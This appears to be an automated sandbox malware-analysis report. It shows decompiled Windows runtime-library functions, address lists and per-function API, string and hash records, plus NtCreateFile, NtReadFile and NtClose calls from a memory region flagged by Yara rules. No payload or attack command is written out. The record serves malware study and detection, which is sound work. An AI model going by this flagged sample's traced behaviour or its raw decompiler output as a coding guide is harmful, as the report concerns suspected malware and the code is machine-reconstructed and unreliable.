                                                      															if(__eflags >= 0) {
                                                      																goto L2;
                                                      															} else {
                                                      																_push(_t63);
                                                      																_t66 = E008C3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                      																asm("int3");
                                                      																while(1) {
                                                      																	_t110 = _t66;
                                                      																	__eflags = _t66 - 1;
                                                      																	if(_t66 != 1) {
                                                      																		break;
                                                      																	}
                                                      																	_t128 = _t128 | 0xffffffff;
                                                      																	_t66 = _t110;
                                                      																	asm("lock cmpxchg [ebx], edi");
                                                      																	__eflags = _t66 - _t110;
                                                      																	if(_t66 != _t110) {
                                                      																		continue;
                                                      																	} else {
                                                      																		_t67 =  *[fs:0x18];
                                                      																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                      																		return _t67;
                                                      																	}
                                                      																	goto L58;
                                                      																}
                                                      																E008A5329(_t110, _t138);
                                                      																return E008A53A5(_t138, 1);
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t56 =  *(_t96 + 0x28);
                                                      												goto L3;
                                                      											}
                                                      										} else {
                                                      											_t107 =  *_t119;
                                                      											__eflags = _t107;
                                                      											if(__eflags > 0) {
                                                      												while(1) {
                                                      													_t81 = _t107;
                                                      													asm("lock cmpxchg [edi], esi");
                                                      													__eflags = _t81 - _t107;
                                                      													if(_t81 == _t107) {
                                                      														break;
                                                      													}
                                                      													_t107 = _t81;
                                                      													__eflags = _t81;
                                                      													if(_t81 > 0) {
                                                      														continue;
                                                      													}
                                                      													break;
                                                      												}
                                                      												_t56 = _a4;
                                                      												__eflags = _t107;
                                                      											}
                                                      											if(__eflags != 0) {
                                                      												while(1) {
                                                      													L3:
                                                      													__eflags = _t56;
                                                      													if(_t56 != 0) {
                                                      														goto L32;
                                                      													}
                                                      													_t107 = _t107 | 0xffffffff;
                                                      													_t56 = 0;
                                                      													asm("lock cmpxchg [edx], ecx");
                                                      													__eflags = 0;
                                                      													if(0 != 0) {
                                                      														continue;
                                                      													} else {
                                                      														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                      														return 1;
                                                      													}
                                                      													goto L58;
                                                      												}
                                                      												continue;
                                                      											} else {
                                                      												goto L40;
                                                      											}
                                                      										}
                                                      										goto L58;
                                                      									}
                                                      									__eflags = 0;
                                                      									return 0;
                                                      								} else {
                                                      									_t115 =  *(_t96 + 0x28);
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								_t106 =  *_t49;
                                                      								__eflags = _t106;
                                                      								if(__eflags > 0) {
                                                      									while(1) {
                                                      										_t93 = _t106;
                                                      										asm("lock cmpxchg [edi], esi");
                                                      										__eflags = _t93 - _t106;
                                                      										if(_t93 == _t106) {
                                                      											break;
                                                      										}
                                                      										_t106 = _t93;
                                                      										__eflags = _t93;
                                                      										if(_t93 > 0) {
                                                      											continue;
                                                      										}
                                                      										break;
                                                      									}
                                                      									__eflags = _t106;
                                                      								}
                                                      								if(__eflags != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L58;
                                                      					}
                                                      					_t84 = _t115;
                                                      					asm("lock cmpxchg [esi], ecx");
                                                      					__eflags = _t84 - _t115;
                                                      					if(_t84 != _t115) {
                                                      						_t115 = _t84;
                                                      						goto L7;
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				}
                                                      				L58:
                                                      			}



































                                                      0x008e23b3
                                                      0x008e23b4
                                                      0x008e23b9
                                                      0x008e23ba
                                                      0x008e23ba
                                                      0x008e23bc
                                                      0x008e23bf
                                                      0x00000000
                                                      0x00000000
                                                      0x008d9153
                                                      0x008d9158
                                                      0x008d915a
                                                      0x008d915e
                                                      0x008d9160
                                                      0x00000000
                                                      0x008d9166
                                                      0x008d9166
                                                      0x008d9171
                                                      0x008d9176
                                                      0x008d9176
                                                      0x00000000
                                                      0x008d9160
                                                      0x008e23c6
                                                      0x008e23d7
                                                      0x008e23d7
                                                      0x008e23ad
                                                      0x008e2390
                                                      0x008e2373
                                                      0x008e233f
                                                      0x008e233f
                                                      0x00000000
                                                      0x008e233f
                                                      0x008e2291
                                                      0x008e2291
                                                      0x008e2293
                                                      0x008e2295
                                                      0x008e229a
                                                      0x008e22a1
                                                      0x008e22a3
                                                      0x008e22a7
                                                      0x008e22a9
                                                      0x00000000
                                                      0x00000000
                                                      0x008e22ab
                                                      0x008e22ad
                                                      0x008e22af
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x008e22af
                                                      0x008e22b1
                                                      0x008e22b4
                                                      0x008e22b4
                                                      0x008e22b6
                                                      0x008a53be
                                                      0x008a53be
                                                      0x008a53be
                                                      0x008a53c0
                                                      0x00000000
                                                      0x00000000
                                                      0x008a53cb
                                                      0x008a53ce
                                                      0x008a53d0
                                                      0x008a53d4
                                                      0x008a53d6
                                                      0x00000000
                                                      0x008a53d8
                                                      0x008a53e3
                                                      0x008a53ea
                                                      0x008a53ea
                                                      0x00000000
                                                      0x008a53d6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x008e22b6
                                                      0x00000000
                                                      0x008e228f
                                                      0x008e2349
                                                      0x008e234d
                                                      0x008e2251
                                                      0x008e2251
                                                      0x00000000
                                                      0x008e2251
                                                      0x008e21a4
                                                      0x008e21a4
                                                      0x008e21a6
                                                      0x008e21a8
                                                      0x008e21ac
                                                      0x008e21b6
                                                      0x008e21b8
                                                      0x008e21bc
                                                      0x008e21be
                                                      0x00000000
                                                      0x00000000
                                                      0x008e21c0
                                                      0x008e21c2
                                                      0x008e21c4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x008e21c4
                                                      0x008e21c6
                                                      0x008e21c6
                                                      0x008e21c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x008e21c8
                                                      0x008e21a2
                                                      0x00000000
                                                      0x008e2183
                                                      0x008c057b
                                                      0x008c057d
                                                      0x008c0581
                                                      0x008c0583
                                                      0x008e2178
                                                      0x00000000
                                                      0x008c0589
                                                      0x008c058f
                                                      0x008c058f
                                                      0x008c0583
                                                      0x00000000

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E2206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-4236105082
                                                      • Opcode ID: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
                                                      • Instruction ID: 9370d6c57b9bafe922966190555a88ba70e3a807648f5901659822d51d1fe5d7
                                                      • Opcode Fuzzy Hash: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
                                                      • Instruction Fuzzy Hash: AC515971B002456BEB249B19CC82F6673ADFF85710F218269FD14DB385E931EC418BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E008C14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                      				signed int _v8;
                                                      				char _v10;
                                                      				char _v140;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t24;
                                                      				void* _t26;
                                                      				signed int _t29;
                                                      				signed int _t34;
                                                      				signed int _t40;
                                                      				intOrPtr _t45;
                                                      				void* _t51;
                                                      				intOrPtr* _t52;
                                                      				void* _t54;
                                                      				signed int _t57;
                                                      				void* _t58;
                                                      
                                                      				_t51 = __edx;
                                                      				_t24 =  *0x962088; // 0x775dafcd
                                                      				_v8 = _t24 ^ _t57;
                                                      				_t45 = _a16;
                                                      				_t53 = _a4;
                                                      				_t52 = _a20;
                                                      				if(_a4 == 0 || _t52 == 0) {
                                                      					L10:
                                                      					_t26 = 0xc000000d;
                                                      				} else {
                                                      					if(_t45 == 0) {
                                                      						if( *_t52 == _t45) {
                                                      							goto L3;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      					} else {
                                                      						L3:
                                                      						_t28 =  &_v140;
                                                      						if(_a12 != 0) {
                                                      							_push("[");
                                                      							_push(0x41);
                                                      							_push( &_v140);
                                                      							_t29 = E008B7707();
                                                      							_t58 = _t58 + 0xc;
                                                      							_t28 = _t57 + _t29 * 2 - 0x88;
                                                      						}
                                                      						_t54 = E008C13CB(_t53, _t28);
                                                      						if(_a8 != 0) {
                                                      							_t34 = E008B7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                      							_t58 = _t58 + 0x10;
                                                      							_t54 = _t54 + _t34 * 2;
                                                      						}
                                                      						if(_a12 != 0) {
                                                      							_t40 = E008B7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                      							_t58 = _t58 + 0x10;
                                                      							_t54 = _t54 + _t40 * 2;
                                                      						}
                                                      						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                      						 *_t52 = _t53;
                                                      						if( *_t52 < _t53) {
                                                      							goto L10;
                                                      						} else {
                                                      							E00882340(_t45,  &_v140, _t53 + _t53);
                                                      							_t26 = 0;
                                                      						}
                                                      					}
                                                      				}
                                                      				return E0088E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                      			}

                                                      APIs
                                                      • ___swprintf_l.LIBCMT ref: 008EEA22
                                                        • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C146B
                                                        • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C1490
                                                      • ___swprintf_l.LIBCMT ref: 008C156D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
                                                      • Instruction ID: 59f404ca7fc0b26f684ea4dc7bb352404320c3bd97eebb5d670a4339af528709
                                                      • Opcode Fuzzy Hash: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
                                                      • Instruction Fuzzy Hash: E72184729006199BCF21EE58CC85FEA73BCFB91704F544159F846D3241DB74EA588BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E22F4
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 008E2328
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
                                                      • RTL: Resource at %p, xrefs: 008E230B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-871070163
                                                      • Opcode ID: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                                      • Instruction ID: 2ca0ade7d821966cbdedf6cd2ddefee1e062d6349907fe140793985e9ff74962
                                                      • Opcode Fuzzy Hash: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                                      • Instruction Fuzzy Hash: 1F5128716006056BEF11DB29CC81FA673ACFF96360F104229FD18DB781EA71EC818BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: __fassign
                                                      • String ID:
                                                      • API String ID: 3965848254-0
                                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                      • Instruction ID: 28194a3dfc470fb678315caf02e57ff23b3c3bc52870c8b9adf1ee0c02fb5190
                                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                      • Instruction Fuzzy Hash: CA915971D0024AEBDF24DFA9C8456FEB7B4FF55318F24807AD511EA263E7309A818B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      APIs
                                                      • NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: @=$m;
                                                      • API String ID: 3535843008-1185082243
                                                      • Opcode ID: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
                                                      • Instruction ID: 414a7036656e8f198db2c382d883a721f13b42f6203ebd5dc8a5a58293b1a342
                                                      • Opcode Fuzzy Hash: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
                                                      • Instruction Fuzzy Hash: 71E092722401146BDB10EBE89C85EEB7768EF84750F118569FA5CAB242C931A2118AE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000985FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
                                                      • Instruction ID: 3b6d84ef3f3adbecb04eb7d1bc3e2a81b9882c98a6db7e614595e8ba54d86d49
                                                      • Opcode Fuzzy Hash: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
                                                      • Instruction Fuzzy Hash: 6B01CFB6241208AFDB48DF88DC85EEB77A9FF8C354F158258FA1D97241D630E851CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000985FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: 1de84a8c26ebc7edd3a087416065dc0c436bebed3768d0cfcb9c803ae6bcc167
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: E5F0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000986A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !:
                                                      • API String ID: 2738559852-2595984152
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: 42a30f2ef5156c0618ecd3b7f0fe7c448ee075f7671ce12c6632b566645b51a6
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: EDF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97255DA30E811CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: @=
                                                      • API String ID: 3535843008-2632950984
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: f87540569f30c08a7b2809185a3ce9d153d9c9dab6d2862f9557835a10c29ec1
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: EED01776200214ABDB10EB99CC89EE77BADEF48760F154499BA189B242C930FA0086E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
